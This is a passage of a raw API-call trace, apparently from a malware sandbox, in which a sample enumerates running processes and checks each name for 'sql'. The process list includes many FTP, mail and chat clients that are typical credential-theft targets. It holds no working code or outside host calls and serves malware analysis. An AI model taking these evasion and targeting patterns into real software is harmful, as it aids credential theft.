WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3582780, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0218.980] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0218.980] StrStrIA (lpFirst="invite.exe", lpSrch="sql") returned 0x0 [0218.980] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0218.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0218.982] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3582840 [0218.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3582840, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0218.982] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0218.982] StrStrIA (lpFirst="idol.exe", lpSrch="sql") returned 0x0 [0218.982] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0218.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0218.983] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3586700 [0218.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x3586700, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0218.983] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0218.983] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="sql") returned 0x0 [0218.983] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0218.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0218.984] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x35866d8 [0218.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x35866d8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0218.984] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0218.984] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="sql") returned 0x0 [0218.984] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0218.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0218.985] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35829c0 [0218.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x35829c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0218.985] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0218.985] StrStrIA (lpFirst="powell_jane.exe", lpSrch="sql") returned 0x0 [0218.985] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0218.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0218.986] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3596128 [0218.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x3596128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0218.986] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0218.986] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="sql") returned 0x0 [0218.986] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0218.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0218.987] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3582738 [0218.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3582738, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0218.988] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0218.988] StrStrIA (lpFirst="gainedshape.exe", lpSrch="sql") returned 0x0 [0218.988] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0218.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0218.989] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35961e8 [0218.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x35961e8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0218.989] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0218.989] StrStrIA (lpFirst="opens-versions.exe", lpSrch="sql") returned 0x0 [0218.989] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0219.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0219.219] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3586750 [0219.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x3586750, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0219.220] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0219.220] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="sql") returned 0x0 [0219.220] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0219.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0219.221] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35827e0 [0219.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x35827e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0219.221] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0219.221] StrStrIA (lpFirst="3dftp.exe", lpSrch="sql") returned 0x0 [0219.221] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0219.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0219.222] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3596148 [0219.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x3596148, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0219.222] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0219.222] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="sql") returned 0x0 [0219.222] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0219.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0219.223] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3582960 [0219.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3582960, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0219.223] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0219.223] StrStrIA (lpFirst="alftp.exe", lpSrch="sql") returned 0x0 [0219.223] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0219.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0219.230] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3582870 [0219.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3582870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0219.230] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0219.230] StrStrIA (lpFirst="barca.exe", lpSrch="sql") returned 0x0 [0219.230] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0219.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0219.231] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582798 [0219.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3582798, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0219.231] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0219.231] StrStrIA (lpFirst="bitkinex.exe", lpSrch="sql") returned 0x0 [0219.232] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0219.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0219.232] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582900 [0219.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x3582900, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0219.233] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0219.233] StrStrIA (lpFirst="coreftp.exe", lpSrch="sql") returned 0x0 [0219.233] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0219.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0219.234] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e458 [0219.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x357e458, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0219.234] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0219.234] StrStrIA (lpFirst="far.exe", lpSrch="sql") returned 0x0 [0219.234] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0219.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0219.235] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35827c8 [0219.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x35827c8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0219.235] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0219.235] StrStrIA (lpFirst="filezilla.exe", lpSrch="sql") returned 0x0 [0219.235] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0219.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0219.236] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35829d8 [0219.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x35829d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0219.236] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0219.236] StrStrIA (lpFirst="flashfxp.exe", lpSrch="sql") returned 0x0 [0219.236] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0219.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0219.237] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3582918 [0219.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x3582918, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0219.237] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0219.237] StrStrIA (lpFirst="fling.exe", lpSrch="sql") returned 0x0 [0219.237] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0219.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0219.238] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3595ee8 [0219.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x3595ee8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0219.238] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0219.238] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="sql") returned 0x0 [0219.238] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0219.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0219.239] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3596168 [0219.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x3596168, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0219.240] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0219.240] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="sql") returned 0x0 [0219.240] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0219.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0219.241] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e308 [0219.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x357e308, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0219.241] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0219.241] StrStrIA (lpFirst="icq.exe", lpSrch="sql") returned 0x0 [0219.241] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0219.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0219.242] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35827f8 [0219.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x35827f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0219.242] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0219.242] StrStrIA (lpFirst="leechftp.exe", lpSrch="sql") returned 0x0 [0219.242] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0219.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 